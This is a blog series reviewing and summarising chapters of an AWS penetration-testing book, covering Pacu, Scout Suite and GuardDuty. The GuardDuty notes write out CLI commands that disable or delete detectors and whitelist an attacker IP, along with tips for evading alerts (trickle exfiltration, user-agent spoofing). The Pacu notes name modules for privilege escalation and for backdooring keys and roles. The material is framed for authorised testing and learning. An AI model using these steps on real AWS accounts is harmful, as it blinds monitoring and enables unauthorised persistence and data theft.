Posted in AWSPTwK, Blog, Review

Book Review: Hands-On AWS Penetration Testing with Kali Linux

Alright, book done time for a book review. I think this one merits a review with recommendations for labbing effectively because while a great book in many ways, there were some huge points of frustration.

Overall Impression

Biggest takeaway – don’t let the issues scare you away. If you are wanting to improve your AWS pentesting skills, this is a valuable read. There are parts that were more general pentesting than AWS pentesting, but I understand including that info for context and to make the book available for a wider audience. I really liked the parts that focused on the AWS aspects. It’s worth your time, but I think you might be able to work through the book more efficiently than I did. There were some things that weren’t clear, some errata, and other things that you often see in tech books. I hope that my notes can help people work through the labs with less frustration than I had.

Thoughts on order

I feel like the organization of the book was modified at some point based on the mismatch of where things were in the Github versus the book chapters. I also think since some of the later sections went through setting things up in greater detail than earlier sections, that supports an order revision later in the writing process. I totally get it – something of this scope is insanely difficult to get to press and keep things connected. The AWS documentation is strong enough to help you get through missing pieces, but it would have been helpful to have certain things earlier.

The order as presented was reasonable – it was more a few pieces had more details later in the book that made it look like it got moved. I would have liked the Pacu chapter at the start of using Pacu. I understand the placement – I just would have preferred the info upfront.

Do you need to do X chapter?

If you want to focus on AWS, you can basically skip sections 1 and 2. Those are really focused on setting up Kali and then using traditional pentesting techniques, just targeting an EC2 instance. You can pick and choose the things that interest you and be ok. You don’t “need” to do all of the chapters if you are wanting to just learn more about specific services. I would recommend doing the IAM and logging portions since those do impact the other services, but you can do the book piecewise if you want.

Do you need to keep X for future chapters?

For the most part, the chapters can standalone. Especially if you have familiarity with AWS. Sections 1 and 2 built on each other a bit, but after that everything should be doable with some minimal additional setup. If you have an AWS lab set up already, you should be able to user a fair amount for this book. Setting up a VPC is something that you will need to do, but it’s not used for everything. The VPC and IAM users/roles are the big things that you need throughout the book. Having a couple S3 buckets available to make public and exploitable as needed is also helpful, but those are so easy to create that making new ones isn’t a big deal. Honestly, it’s all so easy to spin up that the only thing that I would want to keep setup is the Kali instance that had been setup with Guacamole. I didn’t use it for a lot of the later stuff, but you might want to for the pentesting stuff. Since that involved some setup, even just saving it as an AMI that you can create and terminate as needed would be worth it.

Who would benefit from this book?

I feel like this book was a good match for my pentesting skill level. There were a lot of familiar things that were nice to refresh and lots of new things. I think a beginner to pentesting with a decent tech background would be okay, but there would be a fair amount of frustration. For more experienced pentesters who want targeted AWS info, pick and choose what you are looking for. For cloud folks, good info on securing AWS with ideas you can transfer to other platforms. I would not recommend the book for complete beginners (little/no knowledge of networking, security concepts, etc.). But if you’ve got some basic IT experience or are adventurous, go for it.

I noticed a fair amount of frustration from book club members with the initial few chapters. I think it scared some people off from working through the rest of the book because it was taking a lot of time. I know I spent a ton of time trying to get the forensics stuff to work, and when you keep running into roadblocks when you are following the labs, the ROI drops significantly. I’m not sure how much of that the authors could have eliminated given how quickly cloud moves. There are some things that should have been caught (like how forensics work on EXT4…), and I think a little more frustration than I’ve had with labs in other books. But not enough to scare me off from other Packt books or say don’t bother with this particular book.

Costs and how to minimize cost

My costs ran about $10.00 to $15.00 USD each month, and it took me about 6 months to complete. You can definitely work through this more quickly if you are focused. I was doing this on the schedule with book club and had my CASP+ exam in there, plus the whole COVID-19 pandemic thing and work and life. You can reduce costs by terminating your EC2 instances – this and stopping the EC2 instances when you aren’t actively using them are the best ways you can minimize your costs. I used micro instances for most things and boosted my Kali instance up to a medium or large when I needed more power. I also used a CIS image for the Win 2008 R2 server, which had some minimal costs. You can opt for free OS options to further keep costs down.

Realistically, after the initial portion, you don’t have to keep any of the EC2 instances running. You can save your Kali instance as an AMI and pop it up as needed, but I did very little with the created instances after section 2. Without the EC2 instances, the spend would have probably been less than $5.00 USD per month. I also removed the RDS I created once finished because that service can add up. Overall, a very affordable book to work through if you are taking steps to minimize your costs.

Quick list:

  • Total cost was $10.00 – $15.00 USD per month, for a total cost of around $70.00 USD.
  • By terminating the EC2 instances after section 2, cost could have likely been reduced by half.
  • Shut down EC2 instances when not in use.
  • Use the smallest EC2 instance possible and only increase size when needed.

Parting thoughts

Overall, I really enjoyed working through this book. I had a lot of frustrating moments, but I like figuring stuff out. That led to spending more time trying to troubleshoot than I probably should have spent, but I consider that learning experience. I would have liked the info about if things would be needed as the book moved along just to help with cost management. I hope the pieces I’ve put down here and throughout the blogs give enough info for others to learn from my experience and keep their costs down even further.

I would definitely encourage others to blog their notes in at least some format (for anything you are working through). I’m finding it a great way to stay accountable as I work through things. And I know I internalize the information better writing it out for someone else to read. Plus it helps remind you of what you have done and at least point you in the right direction when you can’t remember exactly what you did.

Posted in AWSPTwK, Blog

Hands-On AWS Penetration Testing with Kali Linux Section 7: Leveraging AWS Pentesting Tools for Real-World Attacks – Ch 19 – Putting it All Together – Real-World AWS Pentesting

More notes…

Book info – Hands-On AWS Penetration Testing with Kali Linux

Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.

Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc. 

Remember that depending on your setup, you may not have to specify region and profile in the CLI commands. And make sure your user has the required permissions so you can check things out in the CLI.

Ch 19 – Putting it All Together – Real-World AWS Pentesting

Last chapter – HOORAY! Basically a walkthrough of what the pentest would look like with tips for doing a good pentest. The walkthrough uses a PersonalUser in an attacker-controlled account with iam:UpdateAssumeRolePolicy and s3:LIstBucket permissions and a CompromisedUser that is a compromised user with unspecified permissions.

I’m not going to go in-depth on the how in this blog since previous chapters have covered the exploitation vectors. I’ll be focusing on the process and interesting tidbits provided by the authors. If you’ve gone through the book, all of what’s covered should at least ring a bell.

Make sure to go through a kickoff with the client to cover scope, access, etc. Typical pentest stuff. The scoping part is especially important since AWS won’t scope the way a typical environment would. The authors provide a list of questions to help including asking about number of AWS accounts involved, access given, services used, regions, number of instances and other things in use, IAM info, how users access things, etc. Basically get an idea of size and composition of the environment you are dealing with.

AWS pentesting rules and guidelines

Really glad to see this section – pentesting cloud services tends to make me nervous because permission isn’t as clear. Make sure you aren’t breaking the AWS rules for pentesting and the AUP. Realistically, if you are going to be pentesting AWS, you should read through both of these and watch for updates. The authors did point out that the things AWS prohibits does not refer to things being referred to as pentesting in the book since most of the is using the AWS API to do stuff, which is allowed by the AUP. Potentially some gray area there, but I would expect that a pentesting company would have had legal verify that (meaning that Rhino Security Labs has probably had legal look into it). I’d do my own legal verification though (meaning I would want my company to also verify). Call me paranoid, but I’m not a fan of jail.

Credentials and client expectations

I think we can agree that determining what the client expects is important. And probably making sure that everyone is on the same page so you don’t end up repeating the Coalfire incident that led to arrests and was generally a cluster (through no fault of Coalfire from what I can tell). If the client provides creds, understand what the creds are and if social engineering is allowed. Make sure to find out if you are testing a dev or production environment, anything you shouldn’t touch, and if users are active in the environment. Also find out if there will be a blue team trying to catch you. It’s helpful to provide audit and config checks with the attack narrative, but also keep in mind what the client wants.

Setup

Make sure you have AWS CLI and Pacu ready to go. I’d probably create an AMI so I could have a fresh instance for each test. I’d also have ScoutSuite and the CyberArk tools prepped. Get your AWS keys added, fire up Pacu, and start a new session. If given a set of regions, use set_regions to limit your scope.

Unauthenticated reconnaissance

Other than digging around for open S3 buckets, there’s not a lot you can do completely unauthenticated. So this portion is actually talking about using the PersonalUser to do recon. The first command will come from the CompromisedUser though to get the account ID. Basically, use iam__detect_honeytokens to get the account ID, use swap_keys to switch to the PersonalUser, and use iam__enum_users to look for user info. Use a role from the personal account for the --role-name argument since you need it for one of the API calls. Then use iam__enum_roles to get role info. And review the results to see what you’ve found. The authors walk through the findings in their sample environment and explain what the info could mean.

The last part of the authenticated recon using s3__bucket_finder to look for S3 buckets. Remember to add custom terms to the list used if you have any. The authors note that this module uses the install_dependencies function to pull sub-domain info from Sublist3r and the Buckets.txt file. Interesting aside.

Authenticated reconnaissance plus permissions enumeration

Use swap_keys to pull up the CompromisedUser. Run iam__enum_permissions and then whoami to see what privileges you have. Check out any attached policies. Note that if an ARN is listed, that means it’s an AWS-managed policy. Also look at the list of permissions. While enumerating permissions is important, be aware that it might set off a GuardDuty alert. You can get basic info about permissions for other users and roles with iam__enum_users_roles_policies_groups, but it would be better to use the iam__enum_permissions to get more info.

 run iam__enum_permisisons --all-users --all-roles

This will store the info for manual review or checked for exploitation options with the privilege escalation module. You might also want to run aws__enum_account and aws__enum_spend to get more info. (I might also be using the aws__enum_spend option to keep an eye on costs without logging in to the console because why not?) The spend info can help you determine what services to target, but it won’t account for anything on the free tier, isn’t live, and some resources do not have an associated cost.

Since EC2 has a high exploitation potential, running ec2__enum next would be a good idea. Scan all the regions or use set_regions to be more targeted. Check the user data returned for each instance with ec2__download_userdata. One of the really nice features of Pacu is it will ask you if you want to run the module(s) necessary to do what you want to do if you haven’t already. The user data may include command history, passwords, etc. Definitely a worthwhile thing to check. You might find additional targets to attack, but remember if there is any question about the target being in scope, check with the client.

Privilege escalation

Now that you’ve enumerated things, you can pass the info to iam__privesc_scan to see if any privilege escalation potential exists. The --offline flag indicates all the things will be checked. Review the output to see what you can find. Take note of interesting findings, and be sure to report anything vulnerable to the client. You can try the potential vulnerabilities with run iam__privesc_scan. The authors walkthrough some exploitation options with info about what they would choose and why. Really good info, so be sure to check that out.

Persistence

So with an EC2 spun up, you have some good access, but it’s also something that might stick out and get shut down. Or the associated security groups, etc. could get modified removing your access. So persistence needs to be established in other ways. Like most pentesting things, the authors recommend multiple persistence methods. Creating new access key pairs was one options (the iam__backdoor_users_keys option we used earlier). Another option was using the lambda__backdoor_new_roles module to backdoor IAM roles as they are created to allow you to assume the role with your PersonalUser account.

Post-exploitation

Now it’s time to poke around and see what other issues you can find in the environment. You’ll want to examine as many services as possible because misconfigurations can occur anywhere.

EC2 exploitation

EC2 is a good place to start. Check public IP addresses. You can use CreateLoginProfile to create login creds or the data EC2 command in Pacu to get details. Check security groups to get ideas of what services are running and potential exploitation options. You might be able to do the same to non-public EC2 instances with the right conditions – if you’ve been able to get all the admin access, probably will be able to. With the right access, you could also just modify security group rules to give yourself access with the AuthorizeSecurityGroupIngress AWS command or the ec2__backdoor_ec2_sec_groups Pacu module. There are a couple options for RCE. The first given was ec2__startup_shell_script – this requires a restart. Nope. Just nope. Maybe if you are desperate and have the go-ahead from the client to knock a server offline for a bit, but generally, nope. systemmanager__rce_ec2 is another option. It basically gives you root access if the right connections are met. You could also do some cryptomining if you want to really want to push the limits. On one hand, I highly doubt this would be an option in the vast majority of pentesting engagements. On the other, I can see a client wanting to test detection capabilities since cryptomining is such a popular thing. Like everything else, have very clear communication with the client and document to what extent you are allowed to disrupt the environment or incur costs. Does this make your pentest a little less realistic? Yes. But breaking things, driving up costs, and otherwise running amuck in obvious ways generally are not a great way to get repeat clients. At least not in a production environment. You might also want to check out EBS volumes. You can snapshot EBS volumes and share with your account or an EC2 in the compromised account. Sharing with your account has some advantages (like being able to dig in to examine it), but it’s also more likely to be flagged. Or just use ebs__explore_snapshots in Pacu to check things out. It will iterate through them giving you time to explore the EBS volumes before moving on.

Code review and analysis in Lambda

On to Lambda. Start with enumeration using the lambda__enum Pacu module and review using data Lambda. Check each function and look closely at the environment variables for sensitive data – be sure to record/screenshot interesting findings to report. If you find something that might be exploitable, go for it if in scope. You may also want to download the code for review and exploit any interesting findings (again, if in scope).

Getting past authentication in RDS

RDS can be attacked manually or using Pacu. Getting ahold of the databases to check the data is the goal. You could use a tool like mysqldump to pull the data. Be sure to review the options available for whatever type of database you are dealing with. Using this method keeps you from losing access. If you do this manually, you would need to delete any snapshots you made to avoid running up costs and potentially getting caught (or having a negative impact on the client). Pacu automates this with the rds__explore_snapshots that will scan the regions for RDS instances, ask if you want to copy it, and then clean up when done. Really handy. And this module uses the ModifyDbInstance API call that does a bunch of stuff at once, so the master password being changed won’t pop out.

The authenticated side of S3

Lots of info available on finding public S3 buckets. For a pentest when you have creds, you can look at things a little differently. Note who has access to what and what information is in those buckets. Review files found strategically to make best use of your time. Consider filenames and extensions as hints to value. Check for creds, API keys, etc. The authors recommend alerting the client to any public resources since those can go from not a problem to problematic with a single file put in the wrong place. The authors also note that the bucket doesn’t have to be publicly listable even if the files need to be public. Check for any automation and use bucket and filenames to assist with recon.

Auditing for compliance and best practices

Providing audit info in addition to the pentest info is helpful. Stuff like public access, encryption, logging, backups, MFA, password policies, etc. The authors recommend using tools to help with this info. They mention Prowler and Security Monkey in addition to ScoutSuite. Prowler is an AWS CIS benchmark tool that looks interesting. Something to test out at least and see how you like the output. Security Monkey monitors AWS and GCP accounts, but it is unfortunately EOL in 2020. Security Monkey refers you to AWS Config and GCP Cloud Asset Inventory as alternatives. New tools are coming out all the time, so if this is something you need to use, keep an eye on things.

Summary

AWS pentesting is a major undertaking. It’s (like many things in cybersecurity) going to be a never-ending learning process. The authors note it’s hard to be done with an AWS pentest because the environment can be massive and complicated, so do what you can within the timeline. I think this also makes it critical to clearly define scope and be realistic about what you can do within the confines defined. Like most things, people will set up their AWS environment differently so you’ll have to get the lay of the land for each engagement.

So end of the road for this book. Really good book with some pain points that I’ll cover in the book review post.

Posted in AWSPTwK, Blog

Hands-On AWS Penetration Testing with Kali Linux Section 7: Leveraging AWS Pentesting Tools for Real-World Attacks – Ch 18 – Using Pacu for AWS Pentesting

More notes…

Book info – Hands-On AWS Penetration Testing with Kali Linux

Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.

Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc. 

Remember that depending on your setup, you may not have to specify region and profile in the CLI commands. And make sure your user has the required permissions so you can check things out in the CLI.

Ch 18 – Using Pacu for AWS Pentesting

So now to cover Pacu in more depth. I don’t really agree with the choice to put this chapter this far toward the end – I would probably have put this earlier. It’s fine here at the end, but it seems like it would have been a natural fit earlier. Pacu is from Rhino Security Labs and written in Python 3, which we covered previously. Basically it serves as a way to put all the research done on exploiting AWS into one place. It really is a cool project that has a ton of value.

The authors go over the installation process again and explain some of the pieces. They go more in depth about sessions (basically a way to keep things isolated) and explain it helps limit API calls. AWS keys are needed for most of Pacu’s functionality.

Pacu commands are also explored in depth…review the chapter or check out the github. I’m going to keep this very brief. list/ls lists the modules and categories. search, um, searches. help does what you expect. whoami outputs info about the keys. The amount of data available varies with how much has been enumerated. The iam__enum_permissions will help fill it out. data gives the data stored for the session. services provides info about AWS services that has been stored. regions gives region info. update_regions shouldn’t be needed but can be used to update regions. set_regions is important to help limit API calls – it controls what regions the commands are run in. run/exec does the thing. set_keys is used to add keys. swap_keys lets you use a different set of keys. import_keys pulls keys from the AWS CLI. exit/quit/CTRL+C all quit. And remember you can run AWS CLI commands by using aws.

The proxy command was interesting because it lets you work with the built-in command and control structure PacuProxy. Basically gives you a way to avoid detection by shuttling through a compromised instance. More on this later.

Creating a new module

There’s a template for creating new modules that basically spells out what you need to do. To create your own modules, a better understanding of the API is helpful. So the covered API methods…

The get_active_session API defines the session variable. You can copy and modify session data, but the authors recommend only updating session data at the end to prevent database issues.

The get_proxy_settings (pacu_main.get_proxy_settings) pulls info about PacuProxy. It wouldn’t be likely to get used unless you are working with a module using PacuProxy.

The print and input methods override the native Python print and input methods so you can customize how things are printed. A cool feature is if the print command is outputting a dictionary, it will check for any SecretAccessKey in the dictionary and redact it to keep the key secure.

The key_info method gets info about the active set of AWS keys. Definitely a handy feature.

The fetch_data method facilitates purpose built modules by running modules to enumerate data needed if not available. Basically, if you are trying to do something that needs a different module run, this will run the module to grab the data needed if it’s not there.

The get_regions method lets the module check the region info for the session and run accordingly as well as considering what regions the service is available in on AWS. This is a good option to limit API calls and takes regions off the list of things for module developers to deal with.

The authors start off the install_dependencies section by saying it’s basically deprecated, but it can be helpful if you need to pull dependencies. It will likely be completely removed soon, so check if you are developing a module.

The get_boto3_client and get_boto3_resource take care of the configuration options to interact with the boto3 library. Basically it makes the module developer’s life easier.

Module structure and implementation

The provided template module basically spells out the module structure. The authors walkthrough developing a module using one of the S3 scripts developed earlier. The module code is available on the book GitHub. The integration into Pacu is pretty straightforward. Create a new folder with the desired name in the modules folder, save the module script as main.py in that folder, create an empty __init__.py file in the folder, and run Pacu.

PacuProxy

Note: Unfortunately this module has been removed – that’s a bummer since it looked really cool. I’m leaving this in place in case it comes back at some point.

The chapter wraps with a quick intro to PacuProxy. Basically it’s a C2 framework for the cloud that is part of the Pacu workflow. Very nice. It has it’s own modules that can be used. Probably the biggest takeaway is using PacuProxy will let you proxy through resources you have compromised to help avoid detection. I can see a lot of benefits to using the PacuProxy option once you’ve gotten yourself into an environment. I think if you are going to focus on pentesting AWS, going through the details of PacuProxy would be a very good use of time. The authors do say it’s still in development so they have provided limited details.

Summary

I still think this chapter would have been better situated earlier in the book. That’s not to say I don’t understand it being here – just that the info would have been helpful earlier on. It’s a really great tool that anyone who is responsible for security of an AWS environment would benefit from becoming familiar with. Between Pacu, Scout Suite, and the CyberArk tools SkyArk (that can scan Azure and AWS to look for privileged users) and SkyWrapper (that helps find abuse of temporary tokens), there are a growing number of tools available for those working with cloud environments. The cost can limit the ability to lab things out fully (my AWS costs have been running about $10.00 US per month), but that cost may be more affordable than building out a physical lab. I’m looking forward to doing a lot of this in Azure, but I will admit I have concerns about costs in that environment. I’ve found the cost explanations and breakdowns from AWS to be very clear, but I’ve not found that to be the case with Azure. I plan on pursuing the Developer Subscription when I start building out my own Azure environment. I’ve done a ton of Azure labs through Cybrary and find the environment very easy to work in, but I’m looking forward to getting my own environment spun up in the future.

Posted in AWSPTwK, Blog

Hands-On AWS Penetration Testing with Kali Linux Section 7: Leveraging AWS Pentesting Tools for Real-World Attacks – Ch 17 – Using Scout Suite for AWS Security Auditing

More notes…

Book info – Hands-On AWS Penetration Testing with Kali Linux

Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.

Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc. 

Remember that depending on your setup, you may not have to specify region and profile in the CLI commands. And make sure your user has the required permissions so you can check things out in the CLI.

Ch 17 – Using Scout Suite for AWS Security Auditing

Next up is using Scout Suite to do an audit on the AWS infrastructure. Nice helpful tool with a dashboard report. The book walks through setting up a VPC with an exposed EC2 instance and S3 bucket. I don’t feel a real need to go through that setup, and if you’ve been working through things, you should be able to just use the VPC you’ve already setup. If you have an EC2 in there, you can make it vulnerable. Remember to add the Internet gateway if you create a new VPC.

The vulnerable part of the EC2 is a security group that allows All from Anywhere. I added the group and a new EC2 in my existing VPC. Amazon helpfully told me that the security group assigned to the new EC2 was “open to the world” and you should update the security group. Good call, Amazon.

The vulnerable S3 bucket requires turning off the block all public access option then going to the Access Control List and allowing public read/write access. I think AWS has increased the warnings about making S3 buckets open to the public even more than the last time I created a bucket, which I see as a good thing.

Configuring and running Scout Suite

Scout Suite works on AWS, Azure, and Google Cloud Platform – that is sweet. Set up starts by adding an IAM user with the appropriate permissions: IAM > Add user > Programmatic Access > Attach existing policies directly > Select ReadOnlyAccess and SecurityAudit (use the search feature to save time) > Review and create. Note the access key ID and creds to use for AWS CLI configuration. Configure the CLI with:

 aws configure --profile <auditorprofile>

You can skip the --profile if it’s the only one. Now install Scout Suite. I’m using GitHub because the pip3 version had issues, and I didn’t feel like dealing with it.

 git clone https://github.com/nccgroup/ScoutSuite
 cd ScoutSuite
 sudo pip3 install -r requirements.txt
 python3 scout.py --help #Check install
 python3 scout.py aws --profile <profile>

Note that the script is scout.py not Scout.py as in the book, and you may need to specify the profile depending on how you have the AWS CLI setup. This will give you an HTML report that you can view in the normal ways. It returned a fair number of things, but nothing too surprising. It gives a really nice summary. I can definitely see using ScoutSuite for an overview of cloud infrastructure, much like using PingCastle to check on prem AD.

Using Scout Suite’s rules

Scout Suite very helpfully allows custom rulesets. Pull down the default ruleset to make sure you have the right format.

 curl https://raw.githubusercontent.com/nccgroup/ScoutSuite/master/ScoutSuite/providers/aws/rules/rulesets/detailed.json > detailed-rules.json

The line count has changed, so definitely use whatever feature your text editor has to jump to the approximate line (1200ish on the version I pulled). Now run with the new ruleset:

 python3 scout.py aws --profile <profile> --ruleset <ruleset>

Now the VPC thing should pop as a higher level of warning.

Summary

Very cool tool. Nice quick chapter. I look forward to using Scout Suite to investigate Azure settings and looking into it more for AWS. If nothing else, it’s a really nice way to make sure you’ve turned off the vulnerable things you’ve created for labbing.

Posted in AWSPTwK, Blog

Hands-On AWS Penetration Testing with Kali Linux Section 6: Attacking AWS Logging and Security Services – Ch 16 – GuardDuty

More notes…

Book info – Hands-On AWS Penetration Testing with Kali Linux

Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.

Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc. 

I decided to keep posting by chapter since that worked well for me in the last section. GuardDuty is the AWS security monitoring service. Remember that depending on your setup, you may not have to specify region and profile in the CLI commands. And make sure your user has the required permissions so you can check things out in the CLI.

Ch 16 – GuardDuty

Per the authors, pentesting basics – understanding the monitoring being done is important to inform your attack plan. If you find GuardDuty is not enabled, that doesn’t mean there is no monitoring going on because there are other options available. But GuardDuty is cheap and built-in, which makes it an attractive option when an org is getting started with AWS or is looking to control some costs.

Side note…

Thus the recon step that pentesting generally starts with. Depending on the situation, you may have some of this information provided by your client. You might also be able to use OSINT to get an idea of what the target is using. Job postings and LinkedIn would be some of the first places I look for this. The book just kind of jumps into GuardDuty, so I wanted to think a bit about how you can get this information when you are dealing with more of a blackbox situation. I’m hoping this chapter will cover something you can do in AWS to determine what settings are enabled. Part of pentesting can be gradually getting nosier until you get caught to get an idea of what’s in place. Depends on the situation.

Back to the book.

GuardDuty pulls info from VPC flow logs, CloudTrail event logs, and DNS logs (if the requests go through AWS DNS resolvers). You can’t review DNS logs in AWS, which seems like something that will be addressed at some point. And GuardDuty can use VPC flow logs and CloudTrail logs even if not enabled. I find all of that very interesting for some reason. Not enabled, but still accessible. And not accessible otherwise but still available for GuardDuty. just strikes me as odd. Cross-account management is also available for GuardDuty. If you can get ahold of the GuardDuty master account, you can mess with GuardDuty for all of the associated accounts.

Basically, GuardDuty functions as an IDS. Alerts can set up get notifications suing CloudWatch events. GuardDuty uses machine learning to do user behavior analytics and alert on abnormal behaviors. There are settings to pop on basic attacks like port scanning EC2 instances, brute force attacks on RDP or SSH, and Tor being used to communicate with AWS. None of those are behaviors that should be the norm for an AWS environment. Since GuardDuty does use machine learning, test environments that are constantly having behavior that would be problematic in a prod environment may not alert as expected because dumpster fires are expected.

Alerting about/reacting to GuardDuty findings

GuardDuty shows findings in the web console – which is great, but not something you want to have open all the time. So CloudWatch events can be used to trigger notifications. The authors talk about using the rules to trigger Lambda functions. You could then use the Lambda functions to react to the data and set up some automation in responding to the alerts. The book example was parsing the data in the alert and then blocking outbound access to a known malicious domain. I suppose this functionality could be used to push GuardDuty into IPS territory. Definitely interesting – I’m going to have to do some digging to see if there are published Lambda functions to serve as rules like you have for Snort, Zeek, etc. A quick search makes it looks like there are some things available. Something to dig into if you are a heavy AWS shop.

Bypassing GuardDuty

GuardDuty can trigger on a lot of things, so there are also a variety of ways to bypass things. You could also essentially gaslight defenders by triggering alerts to send defenders in the wrong direction. The first option is basically turning off GuardDuty.

 aws guardduty list-detectors --region <region> --profile <profile>

You can disable the detector found with:

 aws guardduty update-detector --detector-id <detectorID> --no-enable --region <region> --profile <profile>

Alternatively it can be deleted with:

 aws guardduty delete-detector --detector-id <detector-id <detectorID> --region <region> --profile <profile>

That would certainly prevent us from being caught via a GuardDuty alert. Though the whole GuardDuty not being there might be a bit of a red flag if someone was paying attention. Good option to have, but probably one to use at the end of a pentest when you are trying to make noise and get caught.

Bypassing everything with IP whitelisting

A better option is getting your IP added as a trusted IP. It’s under GuardDuty > Settings > Lists in the AWS console. You can also specify threat IPs. There is a max of one trusted IP list per region, so that could be problematic. Check for an existing trusted IP with:

 aws guardduty list-ip-sets --detector-id <detectorID> --region <region> --profile <profile>

You can add IPs by creating a text file and putting it in an S3 bucket that is publicly accessible. It looks like at this time you have a fair number of options to name the text file. I’ll go with ip-trusted.txt.

 aws s3 cp ./ip-trusted.txt s3://<bucket> --region <region> --profile <profile>

Then make it publicly readable so GuardDuty can read it:

 aws s3api put-object-acl --acl public-read --buck <bucket> --key ip-trusted.txt --region <region> --profile <profile>

Just make sure the bucket it set up to allow public read. Now you can access the file via URL and use it to create trusted IP list:

 aws guardduty create-ip-set --detector-id <detectorID> --format TXT --location <URL> --name Trusted --activate

Pacu can automate this:

 run guardduty_whitelist_ip --path <URL>

The book goes on to explain that when you run ListIPSets in Pacu and trusted IPs are present, Pacu will give you the option to delete the existing IP set and replace it with your own. This could cause issues, so be cautious about that option. You could alternatively update the list to include your IP. To amend the list, you have to get the IP set:

 aws guardduty get-ip-set --detector-id <detectorID> --ip-set-id <ipsetID> --region <region> --profile <profile>

Then you can download the list, modify it, and upload it as we did earlier. Then update the IP set:

 aws guardduty update-ip-set --detector-id <detectorID> --ip-set-id <ipsetID> --location <URL> --activate --region <region> --profile <profile>

Be sure to hang on to the original IP set URL so you can change the configuration back when done. The authors also point out that if GuardDuty is set up with cross-account access and another account is the primary account, you can’t modify the trusted IP settings.

Bypassing EC2 instance credential exfiltration alerts

It sounds like getting creds that will work for an EC2 instance but trigger an alert if used from an external IP can trigger an alert. The most common way would be with SSRF (server-side request forgery) on an IAM profile attached to an EC2 instance. The authors say this is a common one to find and easy to bypass. Since it’s triggering on external IPs, you can just use an EC2 instance in the same reason to avoid the trigger.

You can start the EC2 from the CLI:

 aws ec2 run-instances --region <region> --image-id <imageID> --instanct-type <type> --key-name <ec2SSHkeyname> --count 1 --user-data file://userdata.txt

The userdata file will contain the install scripts for Python, pip3, Git, AWS CLI, and Pacu:

 #! /bin/bash
 apt-get update
 apt-get install python3 python3-pip git -y
 pip3 install awscli
 cd /root
 git clone https://github.com/RhinoSecurityLabs/pacu.git
 cd pacu/
 /bin/bash install.sh

Once launched, SSH in and run:

 sudo su
 cd /root/pacu
 python3 pacu.py
 set_keys

And then operate as normal. This GuardDuty alert will only work on EC2 instances for your account, so if creds are for a server hosted by another service, you won’t trigger this type of alert. This also doesn’t track Glue, which is an ETL (extract, transform, and load) service. That was an interesting aside…add Glue to the long list of AWS services to look into.

Bypassing operating system (PenTest) alerts

AWS also has a feature where it can alert on common pentest distros – Kali, Parrot, and Pentoo. Easy to bypass, but a cool feature. Basically, just change your user agent. Pacu will automatically change the user agent, but a script is also provided that would update the user agent.

Other simple bypasses

Since GuardDuty watches for low hanging fruit, there are some ways to avoid it. Like not using Tor, doing port scanning from/to EC2 instances, don’t brute-force SSH/RDP, and don’t interact with known bad. Those seem kind of obvious.

Cyrptocurrency

Don’t set up cyrptomining as part of a pentest (that’s good advice – for real, don’t do that). There are alerts for this, but you can avoid by staying away from connections to known cyrptocurrency related domains/IPs.

Behavior

GuardDuty can also alert on unusual port activity. So sticking to HTTP and HTTPS will help avoid that. And you can avoid the alerts on large data exfil by using a trickle approach over a longer period of time.

Resource Consumption

This triggers on launching resources into the account. Avoid this by avoiding regions with GuardDuty enabled. If GuardDuty is enabled in all regions, bypass by avoiding the API call or using a different service like Lightsail, Glue, or AppStream.

Stealth

GuardDuty also alerts if you make a password policy weaker. Avoid that by not messing with password requirements.

Trojan

GuardDuty also alerts on coms with known bad IPs/domains. So don’t use those. It will also trigger on DNS data exfiltration, so you can avoid that if the DNS service is not using AWS.

Others

There are other things you can do. The authors say they are more difficult, specific, etc. so are not covered.

Summary

Slower start with a rapid fire end. Interesting service that will be fun to watch mature. Remember that other things might be watching too, so don’t count on bypassing GuardDuty to be sufficient to avoid detection. But you should still avoid it so you avoid the easily checked things that are built in to AWS.